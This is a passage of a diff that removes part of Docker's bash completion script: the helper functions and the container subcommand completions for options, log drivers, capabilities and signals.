-__docker_complete_plugins_installed() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_plugins_installed "$@")" -- "$current") ) -} - -__docker_runtimes() { - __docker_q info | sed -n 's/^Runtimes: \(.*\)/\1/p' -} - -__docker_complete_runtimes() { - COMPREPLY=( $(compgen -W "$(__docker_runtimes)" -- "$cur") ) -} - -# __docker_secrets returns a list of all secrets. -# By default, only names of secrets are returned. -# Set DOCKER_COMPLETION_SHOW_SECRET_IDS=yes to also complete IDs of secrets. -__docker_secrets() { - local fields='$2' # default: name only - [ "${DOCKER_COMPLETION_SHOW_SECRET_IDS}" = yes ] && fields='$1,$2' # ID and name - - __docker_q secret ls | awk "NR>1 {print $fields}" -} - -# __docker_complete_secrets applies completion of secrets based on the current value -# of `$cur`. -__docker_complete_secrets() { - COMPREPLY=( $(compgen -W "$(__docker_secrets)" -- "$cur") ) -} - -# __docker_stacks returns a list of all stacks. -__docker_stacks() { - __docker_q stack ls | awk 'NR>1 {print $1}' -} - -# __docker_complete_stacks applies completion of stacks based on the current value -# of `$cur` or the value of the optional first option `--cur`, if given. -__docker_complete_stacks() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_stacks "$@")" -- "$current") ) -} - -# __docker_nodes returns a list of all nodes. Additional options to -# `docker node ls` may be specified in order to filter the list, e.g. -# `__docker_nodes --filter role=manager` -# By default, only node names are returned. -# Set DOCKER_COMPLETION_SHOW_NODE_IDS=yes to also complete node IDs. -# An optional first option `--id|--name` may be used to limit the -# output to the IDs or names of matching items. This setting takes -# precedence over the environment setting. -# Completions may be added with `--add`, e.g. `--add self`. 
-__docker_nodes() { - local add=() - local fields='$2' # default: node name only - [ "${DOCKER_COMPLETION_SHOW_NODE_IDS}" = yes ] && fields='$1,$2' # ID and name - - while true ; do - case "$1" in - --id) - fields='$1' # IDs only - shift - ;; - --name) - fields='$2' # names only - shift - ;; - --add) - add+=("$2") - shift 2 - ;; - *) - break - ;; - esac - done - - echo $(__docker_q node ls "$@" | tr -d '*' | awk "NR>1 {print $fields}") "${add[@]}" -} - -# __docker_complete_nodes applies completion of nodes based on the current -# value of `$cur` or the value of the optional first option `--cur`, if given. -# Additional filters may be appended, see `__docker_nodes`. -__docker_complete_nodes() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_nodes "$@")" -- "$current") ) -} - -__docker_complete_nodes_plus_self() { - __docker_complete_nodes --add self "$@" -} - -# __docker_services returns a list of all services. Additional options to -# `docker service ls` may be specified in order to filter the list, e.g. -# `__docker_services --filter name=xxx` -# By default, only node names are returned. -# Set DOCKER_COMPLETION_SHOW_SERVICE_IDS=yes to also complete IDs. -# An optional first option `--id|--name` may be used to limit the -# output to the IDs or names of matching items. This setting takes -# precedence over the environment setting. -__docker_services() { - local fields='$2' # default: service name only - [ "${DOCKER_COMPLETION_SHOW_SERVICE_IDS}" = yes ] && fields='$1,$2' # ID & name - - if [ "$1" = "--id" ] ; then - fields='$1' # IDs only - shift - elif [ "$1" = "--name" ] ; then - fields='$2' # names only - shift - fi - __docker_q service ls "$@" | awk "NR>1 {print $fields}" -} - -# __docker_complete_services applies completion of services based on the current -# value of `$cur` or the value of the optional first option `--cur`, if given. 
-# Additional filters may be appended, see `__docker_services`. -__docker_complete_services() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_services "$@")" -- "$current") ) -} - -# __docker_append_to_completions appends the word passed as an argument to every -# word in `$COMPREPLY`. -# Normally you do this with `compgen -S` while generating the completions. -# This function allows you to append a suffix later. It allows you to use -# the __docker_complete_XXX functions in cases where you need a suffix. -__docker_append_to_completions() { - COMPREPLY=( ${COMPREPLY[@]/%/"$1"} ) -} - -# __docker_is_experimental tests whether the currently configured Docker daemon -# runs in experimental mode. If so, the function exits with 0 (true). -# Otherwise, or if the result cannot be determined, the exit value is 1 (false). -__docker_is_experimental() { - [ "$(__docker_q version -f '{{.Server.Experimental}}')" = "true" ] -} - -# __docker_pos_first_nonflag finds the position of the first word that is neither -# option nor an option's argument. If there are options that require arguments, -# you should pass a glob describing those options, e.g. "--option1|-o|--option2" -# Use this function to restrict completions to exact positions after the argument list. 
-__docker_pos_first_nonflag() { - local argument_flags=$1 - - local counter=$((${subcommand_pos:-${command_pos}} + 1)) - while [ $counter -le $cword ]; do - if [ -n "$argument_flags" ] && eval "case '${words[$counter]}' in $argument_flags) true ;; *) false ;; esac"; then - (( counter++ )) - # eat "=" in case of --option=arg syntax - [ "${words[$counter]}" = "=" ] && (( counter++ )) - else - case "${words[$counter]}" in - -*) - ;; - *) - break - ;; - esac - fi - - # Bash splits words at "=", retaining "=" as a word, examples: - # "--debug=false" => 3 words, "--log-opt syslog-facility=daemon" => 4 words - while [ "${words[$counter + 1]}" = "=" ] ; do - counter=$(( counter + 2)) - done - - (( counter++ )) - done - - echo $counter -} - -# __docker_map_key_of_current_option returns `key` if we are currently completing the -# value of a map option (`key=value`) which matches the extglob given as an argument. -# This function is needed for key-specific completions. -__docker_map_key_of_current_option() { - local glob="$1" - - local key glob_pos - if [ "$cur" = "=" ] ; then # key= case - key="$prev" - glob_pos=$((cword - 2)) - elif [[ $cur == *=* ]] ; then # key=value case (OSX) - key=${cur%=*} - glob_pos=$((cword - 1)) - elif [ "$prev" = "=" ] ; then - key=${words[$cword - 2]} # key=value case - glob_pos=$((cword - 3)) - else - return - fi - - [ "${words[$glob_pos]}" = "=" ] && ((glob_pos--)) # --option=key=value syntax - - [[ ${words[$glob_pos]} == @($glob) ]] && echo "$key" -} - -# __docker_value_of_option returns the value of the first option matching `option_glob`. -# Valid values for `option_glob` are option names like `--log-level` and globs like -# `--log-level|-l` -# Only positions between the command and the current word are considered. 
-__docker_value_of_option() { - local option_extglob=$(__docker_to_extglob "$1") - - local counter=$((command_pos + 1)) - while [ $counter -lt $cword ]; do - case ${words[$counter]} in - $option_extglob ) - echo ${words[$counter + 1]} - break - ;; - esac - (( counter++ )) - done -} - -# __docker_to_alternatives transforms a multiline list of strings into a single line -# string with the words separated by `|`. -# This is used to prepare arguments to __docker_pos_first_nonflag(). -__docker_to_alternatives() { - local parts=( $1 ) - local IFS='|' - echo "${parts[*]}" -} - -# __docker_to_extglob transforms a multiline list of options into an extglob pattern -# suitable for use in case statements. -__docker_to_extglob() { - local extglob=$( __docker_to_alternatives "$1" ) - echo "@($extglob)" -} - -# __docker_subcommands processes subcommands -# Locates the first occurrence of any of the subcommands contained in the -# first argument. In case of a match, calls the corresponding completion -# function and returns 0. -# If no match is found, 1 is returned. The calling function can then -# continue processing its completion. -# -# TODO if the preceding command has options that accept arguments and an -# argument is equal ot one of the subcommands, this is falsely detected as -# a match. 
-__docker_subcommands() { - local subcommands="$1" - - local counter=$(($command_pos + 1)) - while [ $counter -lt $cword ]; do - case "${words[$counter]}" in - $(__docker_to_extglob "$subcommands") ) - subcommand_pos=$counter - local subcommand=${words[$counter]} - local completions_func=_docker_${command}_${subcommand} - declare -F $completions_func >/dev/null && $completions_func - return 0 - ;; - esac - (( counter++ )) - done - return 1 -} - -# __docker_nospace suppresses trailing whitespace -__docker_nospace() { - # compopt is not available in ancient bash versions - type compopt &>/dev/null && compopt -o nospace -} - -__docker_complete_resolved_hostname() { - command -v host >/dev/null 2>&1 || return - COMPREPLY=( $(host 2>/dev/null "${cur%:}" | awk '/has address/ {print $4}') ) -} - -__docker_local_interfaces() { - command -v ip >/dev/null 2>&1 || return - ip addr show scope global 2>/dev/null | sed -n 's| \+inet \([0-9.]\+\).* \([^ ]\+\)|\1 \2|p' -} - -__docker_complete_local_interfaces() { - local additional_interface - if [ "$1" = "--add" ] ; then - additional_interface="$2" - fi - - COMPREPLY=( $( compgen -W "$(__docker_local_interfaces) $additional_interface" -- "$cur" ) ) -} - -__docker_complete_capabilities() { - # The list of capabilities is defined in types.go, ALL was added manually. 
- COMPREPLY=( $( compgen -W " - ALL - AUDIT_CONTROL - AUDIT_WRITE - AUDIT_READ - BLOCK_SUSPEND - CHOWN - DAC_OVERRIDE - DAC_READ_SEARCH - FOWNER - FSETID - IPC_LOCK - IPC_OWNER - KILL - LEASE - LINUX_IMMUTABLE - MAC_ADMIN - MAC_OVERRIDE - MKNOD - NET_ADMIN - NET_BIND_SERVICE - NET_BROADCAST - NET_RAW - SETFCAP - SETGID - SETPCAP - SETUID - SYS_ADMIN - SYS_BOOT - SYS_CHROOT - SYSLOG - SYS_MODULE - SYS_NICE - SYS_PACCT - SYS_PTRACE - SYS_RAWIO - SYS_RESOURCE - SYS_TIME - SYS_TTY_CONFIG - WAKE_ALARM - " -- "$cur" ) ) -} - -__docker_complete_detach-keys() { - case "$prev" in - --detach-keys) - case "$cur" in - *,) - COMPREPLY=( $( compgen -W "${cur}ctrl-" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "ctrl-" -- "$cur" ) ) - ;; - esac - - __docker_nospace - return - ;; - esac - return 1 -} - -__docker_complete_isolation() { - COMPREPLY=( $( compgen -W "default hyperv process" -- "$cur" ) ) -} - -__docker_complete_log_drivers() { - COMPREPLY=( $( compgen -W " - awslogs - etwlogs - fluentd - gcplogs - gelf - journald - json-file - logentries - none - splunk - syslog - " -- "$cur" ) ) -} - -__docker_complete_log_options() { - # see docs/reference/logging/index.md - local awslogs_options="awslogs-region awslogs-group awslogs-stream" - local fluentd_options="env fluentd-address fluentd-async-connect fluentd-buffer-limit fluentd-retry-wait fluentd-max-retries labels tag" - local gcplogs_options="env gcp-log-cmd gcp-project labels" - local gelf_options="env gelf-address gelf-compression-level gelf-compression-type labels tag" - local journald_options="env labels tag" - local json_file_options="env labels max-file max-size" - local logentries_options="logentries-token" - local syslog_options="env labels syslog-address syslog-facility syslog-format syslog-tls-ca-cert syslog-tls-cert syslog-tls-key syslog-tls-skip-verify tag" - local splunk_options="env labels splunk-caname splunk-capath splunk-format splunk-gzip splunk-gzip-level splunk-index splunk-insecureskipverify 
splunk-source splunk-sourcetype splunk-token splunk-url splunk-verify-connection tag" - - local all_options="$fluentd_options $gcplogs_options $gelf_options $journald_options $logentries_options $json_file_options $syslog_options $splunk_options" - - case $(__docker_value_of_option --log-driver) in - '') - COMPREPLY=( $( compgen -W "$all_options" -S = -- "$cur" ) ) - ;; - awslogs) - COMPREPLY=( $( compgen -W "$awslogs_options" -S = -- "$cur" ) ) - ;; - fluentd) - COMPREPLY=( $( compgen -W "$fluentd_options" -S = -- "$cur" ) ) - ;; - gcplogs) - COMPREPLY=( $( compgen -W "$gcplogs_options" -S = -- "$cur" ) ) - ;; - gelf) - COMPREPLY=( $( compgen -W "$gelf_options" -S = -- "$cur" ) ) - ;; - journald) - COMPREPLY=( $( compgen -W "$journald_options" -S = -- "$cur" ) ) - ;; - json-file) - COMPREPLY=( $( compgen -W "$json_file_options" -S = -- "$cur" ) ) - ;; - logentries) - COMPREPLY=( $( compgen -W "$logentries_options" -S = -- "$cur" ) ) - ;; - syslog) - COMPREPLY=( $( compgen -W "$syslog_options" -S = -- "$cur" ) ) - ;; - splunk) - COMPREPLY=( $( compgen -W "$splunk_options" -S = -- "$cur" ) ) - ;; - *) - return - ;; - esac - - __docker_nospace -} - -__docker_complete_log_driver_options() { - local key=$(__docker_map_key_of_current_option '--log-opt') - case "$key" in - fluentd-async-connect) - COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) - return - ;; - gelf-address) - COMPREPLY=( $( compgen -W "udp" -S "://" -- "${cur##*=}" ) ) - __docker_nospace - return - ;; - gelf-compression-level) - COMPREPLY=( $( compgen -W "1 2 3 4 5 6 7 8 9" -- "${cur##*=}" ) ) - return - ;; - gelf-compression-type) - COMPREPLY=( $( compgen -W "gzip none zlib" -- "${cur##*=}" ) ) - return - ;; - syslog-address) - COMPREPLY=( $( compgen -W "tcp:// tcp+tls:// udp:// unix://" -- "${cur##*=}" ) ) - __docker_nospace - __ltrim_colon_completions "${cur}" - return - ;; - syslog-facility) - COMPREPLY=( $( compgen -W " - auth - authpriv - cron - daemon - ftp - kern - local0 - local1 - 
local2 - local3 - local4 - local5 - local6 - local7 - lpr - mail - news - syslog - user - uucp - " -- "${cur##*=}" ) ) - return - ;; - syslog-format) - COMPREPLY=( $( compgen -W "rfc3164 rfc5424 rfc5424micro" -- "${cur##*=}" ) ) - return - ;; - syslog-tls-ca-cert|syslog-tls-cert|syslog-tls-key) - _filedir - return - ;; - syslog-tls-skip-verify) - COMPREPLY=( $( compgen -W "true" -- "${cur##*=}" ) ) - return - ;; - splunk-url) - COMPREPLY=( $( compgen -W "http:// https://" -- "${cur##*=}" ) ) - __docker_nospace - __ltrim_colon_completions "${cur}" - return - ;; - splunk-gzip|splunk-insecureskipverify|splunk-verify-connection) - COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) - return - ;; - splunk-format) - COMPREPLY=( $( compgen -W "inline json raw" -- "${cur##*=}" ) ) - return - ;; - esac - return 1 -} - -__docker_complete_log_levels() { - COMPREPLY=( $( compgen -W "debug info warn error fatal" -- "$cur" ) ) -} - -__docker_complete_restart() { - case "$prev" in - --restart) - case "$cur" in - on-failure:*) - ;; - *) - COMPREPLY=( $( compgen -W "always no on-failure on-failure: unless-stopped" -- "$cur") ) - ;; - esac - return - ;; - esac - return 1 -} - -# __docker_complete_signals returns a subset of the available signals that is most likely -# relevant in the context of docker containers -__docker_complete_signals() { - local signals=( - SIGCONT - SIGHUP - SIGINT - SIGKILL - SIGQUIT - SIGSTOP - SIGTERM - SIGUSR1 - SIGUSR2 - ) - COMPREPLY=( $( compgen -W "${signals[*]} ${signals[*]#SIG}" -- "$( echo $cur | tr '[:lower:]' '[:upper:]')" ) ) -} - -__docker_complete_user_group() { - if [[ $cur == *:* ]] ; then - COMPREPLY=( $(compgen -g -- "${cur#*:}") ) - else - COMPREPLY=( $(compgen -u -S : -- "$cur") ) - __docker_nospace - fi -} - -_docker_docker() { - # global options that may appear after the docker command - local boolean_options=" - $global_boolean_options - --help - --version -v - " - - case "$prev" in - --config) - _filedir -d - return - ;; - 
--log-level|-l) - __docker_complete_log_levels - return - ;; - $(__docker_to_extglob "$global_options_with_args") ) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "$boolean_options $global_options_with_args" -- "$cur" ) ) - ;; - *) - local counter=$( __docker_pos_first_nonflag "$(__docker_to_extglob "$global_options_with_args")" ) - if [ $cword -eq $counter ]; then - __docker_is_experimental && commands+=(${experimental_commands[*]}) - COMPREPLY=( $( compgen -W "${commands[*]} help" -- "$cur" ) ) - fi - ;; - esac -} - -_docker_attach() { - _docker_container_attach -} - -_docker_build() { - _docker_image_build -} - - -_docker_checkpoint() { - local subcommands=" - create - ls - rm - " - local aliases=" - list - remove - " - __docker_subcommands "$subcommands $aliases" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_checkpoint_create() { - case "$prev" in - --checkpoint-dir) - _filedir -d - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--checkpoint-dir --help --leave-running" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--checkpoint-dir') - if [ $cword -eq $counter ]; then - __docker_complete_containers_running - fi - ;; - esac -} - -_docker_checkpoint_ls() { - case "$prev" in - --checkpoint-dir) - _filedir -d - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--checkpoint-dir --help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--checkpoint-dir') - if [ $cword -eq $counter ]; then - __docker_complete_containers_all - fi - ;; - esac -} - -_docker_checkpoint_rm() { - case "$prev" in - --checkpoint-dir) - _filedir -d - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--checkpoint-dir --help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--checkpoint-dir') - if [ 
$cword -eq $counter ]; then - __docker_complete_containers_all - elif [ $cword -eq $(($counter + 1)) ]; then - COMPREPLY=( $( compgen -W "$(__docker_q checkpoint ls "$prev" | sed 1d)" -- "$cur" ) ) - fi - ;; - esac -} - - -_docker_container() { - local subcommands=" - attach - commit - cp - create - diff - exec - export - inspect - kill - logs - ls - pause - port - prune - rename - restart - rm - run - start - stats - stop - top - unpause - update - wait - " - local aliases=" - list - ps - " - __docker_subcommands "$subcommands $aliases" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_container_attach() { - __docker_complete_detach-keys && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--detach-keys --help --no-stdin --sig-proxy=false" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--detach-keys') - if [ $cword -eq $counter ]; then - __docker_complete_containers_running - fi - ;; - esac -} - -_docker_container_commit() { - case "$prev" in - --author|-a|--change|-c|--message|-m) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--author -a --change -c --help --message -m --pause=false -p=false" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--author|-a|--change|-c|--message|-m') - - if [ $cword -eq $counter ]; then - __docker_complete_containers_all - return - fi - (( counter++ )) - - if [ $cword -eq $counter ]; then - __docker_complete_image_repos_and_tags - return - fi - ;; - esac -} - -_docker_container_cp() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--follow-link -L --help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - case "$cur" in - *:) - return - ;; - *) - # combined container and filename completion - _filedir - local files=( ${COMPREPLY[@]} ) - - 
__docker_complete_containers_all - COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) - local containers=( ${COMPREPLY[@]} ) - - COMPREPLY=( $( compgen -W "${files[*]} ${containers[*]}" -- "$cur" ) ) - if [[ "$COMPREPLY" == *: ]]; then - __docker_nospace - fi - return - ;; - esac - fi - (( counter++ )) - - if [ $cword -eq $counter ]; then - if [ -e "$prev" ]; then - __docker_complete_containers_all - COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) - __docker_nospace - else - _filedir - fi - return - fi - ;; - esac -} - -_docker_container_create() { - _docker_container_run -} - -_docker_container_diff() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_containers_all - fi - ;; - esac -} - -_docker_container_exec() { - __docker_complete_detach-keys && return - - case "$prev" in - --env|-e) - # we do not append a "=" here because "-e VARNAME" is legal systax, too - COMPREPLY=( $( compgen -e -- "$cur" ) ) - __docker_nospace - return - ;; - --user|-u) - __docker_complete_user_group - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--detach -d --detach-keys --env -e --help --interactive -i --privileged -t --tty -u --user" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_running - ;; - esac -} - -_docker_container_export() { - case "$prev" in - --output|-o) - _filedir - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --output -o" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_containers_all - fi - ;; - esac -} - -_docker_container_inspect() { - _docker_inspect --type container -} - -_docker_container_kill() { - case "$prev" in - --signal|-s) - __docker_complete_signals - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --signal -s" -- "$cur" ) ) - ;; - *) - 
__docker_complete_containers_running - ;; - esac -} - -_docker_container_logs() { - case "$prev" in - --since|--tail) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--details --follow -f --help --since --tail --timestamps -t" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--since|--tail') - if [ $cword -eq $counter ]; then - __docker_complete_containers_all - fi - ;; - esac -} - -_docker_container_list() { - _docker_container_ls -} - -_docker_container_ls() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - ancestor) - cur="${cur##*=}" - __docker_complete_images - return - ;; - before) - __docker_complete_containers_all --cur "${cur##*=}" - return - ;; - id) - __docker_complete_containers_all --cur "${cur##*=}" --id - return - ;; - health) - COMPREPLY=( $( compgen -W "healthy starting none unhealthy" -- "${cur##*=}" ) ) - return - ;; - is-task) - COMPREPLY=( $( compgen -W "true false" -- "${cur##*=}" ) ) - return - ;; - name) - __docker_complete_containers_all --cur "${cur##*=}" --name - return - ;; - network) - __docker_complete_networks --cur "${cur##*=}" - return - ;; - since) - __docker_complete_containers_all --cur "${cur##*=}" - return - ;; - status) - COMPREPLY=( $( compgen -W "created dead exited paused restarting running removing" -- "${cur##*=}" ) ) - return - ;; - volume) - __docker_complete_volumes --cur "${cur##*=}" - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "ancestor before exited health id is-task label name network since status volume" -- "$cur" ) ) - __docker_nospace - return - ;; - --format|--last|-n) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--all -a --filter -f --format --help --last -n --latest -l --no-trunc --quiet -q --size -s" -- "$cur" ) ) - ;; - esac -} - -_docker_container_pause() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - 
__docker_complete_containers_running - ;; - esac -} - -_docker_container_port() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_containers_all - fi - ;; - esac -} - -_docker_container_prune() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - esac -} - -_docker_container_ps() { - _docker_container_ls -} - -_docker_container_rename() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_containers_all - fi - ;; - esac -} - -_docker_container_restart() { - case "$prev" in - --time|-t) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --time -t" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_all - ;; - esac -} - -_docker_container_rm() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help --link -l --volumes -v" -- "$cur" ) ) - ;; - *) - for arg in "${COMP_WORDS[@]}"; do - case "$arg" in - --force|-f) - __docker_complete_containers_all - return - ;; - esac - done - __docker_complete_containers_stopped - ;; - esac -} - -_docker_container_run() { - local options_with_args=" - --add-host - --attach -a - --blkio-weight - --blkio-weight-device - --cap-add - --cap-drop - --cgroup-parent - --cidfile - --cpu-period - --cpu-quota - --cpu-rt-period - --cpu-rt-runtime - --cpuset-cpus - --cpus - --cpuset-mems - --cpu-shares -c - --device - --device-read-bps - --device-read-iops - --device-write-bps - --device-write-iops - --dns - --dns-option - --dns-search - --entrypoint - --env -e - --env-file - --expose - --group-add - --hostname -h - --init-path - --ip - --ip6 - --ipc - --isolation - --kernel-memory - --label-file - --label -l - --link - --link-local-ip - --log-driver - --log-opt - --mac-address - --memory -m 
- --memory-swap - --memory-swappiness - --memory-reservation - --name - --network - --network-alias - --oom-score-adj - --pid - --pids-limit - --publish -p - --restart - --runtime - --security-opt - --shm-size - --stop-signal - --stop-timeout - --storage-opt - --tmpfs - --sysctl - --ulimit - --user -u - --userns - --uts - --volume-driver - --volumes-from - --volume -v - --workdir -w - " - - local boolean_options=" - --disable-content-trust=false - --help - --init - --interactive -i - --oom-kill-disable - --privileged - --publish-all -P - --read-only - --tty -t - " - - if [ "$command" = "run" -o "$subcommand" = "run" ] ; then - options_with_args="$options_with_args - --detach-keys - --health-cmd - --health-interval - --health-retries - --health-timeout - " - boolean_options="$boolean_options - --detach -d - --no-healthcheck - --rm - --sig-proxy=false - " - __docker_complete_detach-keys && return - fi - - local all_options="$options_with_args $boolean_options" - - - __docker_complete_log_driver_options && return - __docker_complete_restart && return - - local key=$(__docker_map_key_of_current_option '--security-opt') - case "$key" in - label) - [[ $cur == *: ]] && return - COMPREPLY=( $( compgen -W "user: role: type: level: disable" -- "${cur##*=}") ) - if [ "${COMPREPLY[*]}" != "disable" ] ; then - __docker_nospace - fi - return - ;; - seccomp) - local cur=${cur##*=} - _filedir - COMPREPLY+=( $( compgen -W "unconfined" -- "$cur" ) ) - return - ;; - esac - - case "$prev" in - --add-host) - case "$cur" in - *:) - __docker_complete_resolved_hostname - return - ;; - esac - ;; - --attach|-a) - COMPREPLY=( $( compgen -W 'stdin stdout stderr' -- "$cur" ) ) - return - ;; - --cap-add|--cap-drop) - __docker_complete_capabilities - return - ;; - --cidfile|--env-file|--init-path|--label-file) - _filedir - return - ;; - --device|--tmpfs|--volume|-v) - case "$cur" in - *:*) - # TODO somehow do _filedir for stuff inside the image, if it's already specified (which is also somewhat 
difficult to determine) - ;; - '') - COMPREPLY=( $( compgen -W '/' -- "$cur" ) ) - __docker_nospace - ;; - /*) - _filedir - __docker_nospace - ;; - esac - return - ;; - --env|-e) - # we do not append a "=" here because "-e VARNAME" is legal systax, too - COMPREPLY=( $( compgen -e -- "$cur" ) ) - __docker_nospace - return - ;; - --ipc) - case "$cur" in - *:*) - cur="${cur#*:}" - __docker_complete_containers_running - ;; - *) - COMPREPLY=( $( compgen -W 'host container:' -- "$cur" ) ) - if [ "$COMPREPLY" = "container:" ]; then - __docker_nospace - fi - ;; - esac - return - ;; - --isolation) - __docker_complete_isolation - return - ;; - --link) - case "$cur" in - *:*) - ;; - *) - __docker_complete_containers_running - COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) - __docker_nospace - ;; - esac - return - ;; - --log-driver) - __docker_complete_log_drivers - return - ;; - --log-opt) - __docker_complete_log_options - return - ;; - --network) - case "$cur" in - container:*) - __docker_complete_containers_all --cur "${cur#*:}" - ;; - *) - COMPREPLY=( $( compgen -W "$(__docker_plugins_bundled --type Network) $(__docker_networks) container:" -- "$cur") ) - if [ "${COMPREPLY[*]}" = "container:" ] ; then - __docker_nospace - fi - ;; - esac - return - ;; - --pid) - case "$cur" in - *:*) - __docker_complete_containers_running --cur "${cur#*:}" - ;; - *) - COMPREPLY=( $( compgen -W 'host container:' -- "$cur" ) ) - if [ "$COMPREPLY" = "container:" ]; then - __docker_nospace - fi - ;; - esac - return - ;; - --runtime) - __docker_complete_runtimes - return - ;; - --security-opt) - COMPREPLY=( $( compgen -W "apparmor= label= no-new-privileges seccomp=" -- "$cur") ) - if [ "${COMPREPLY[*]}" != "no-new-privileges" ] ; then - __docker_nospace - fi - return - ;; - --storage-opt) - COMPREPLY=( $( compgen -W "size" -S = -- "$cur") ) - __docker_nospace - return - ;; - --user|-u) - __docker_complete_user_group - return - ;; - --userns) - COMPREPLY=( $( compgen -W "host" -- "$cur" ) 
) - return - ;; - --volume-driver) - __docker_complete_plugins_bundled --type Volume - return - ;; - --volumes-from) - __docker_complete_containers_all - return - ;; - $(__docker_to_extglob "$options_with_args") ) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) ) - ;; - *) - local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) - if [ $cword -eq $counter ]; then - __docker_complete_images - fi - ;; - esac -} - -_docker_container_start() { - __docker_complete_detach-keys && return - - case "$prev" in - --checkpoint) - if [ __docker_is_experimental ] ; then - return - fi - ;; - --checkpoint-dir) - if [ __docker_is_experimental ] ; then - _filedir -d - return - fi - ;; - esac - - case "$cur" in - -*) - local options="--attach -a --detach-keys --help --interactive -i" - __docker_is_experimental && options+=" --checkpoint --checkpoint-dir" - COMPREPLY=( $( compgen -W "$options" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_stopped - ;; - esac -} - -_docker_container_stats() { - case "$prev" in - --format) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--all -a --format --help --no-stream" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_running - ;; - esac -} - -_docker_container_stop() { - case "$prev" in - --time|-t) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --time -t" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_running - ;; - esac -} - -_docker_container_top() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_containers_running - fi - ;; - esac -} - -_docker_container_unpause() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - 
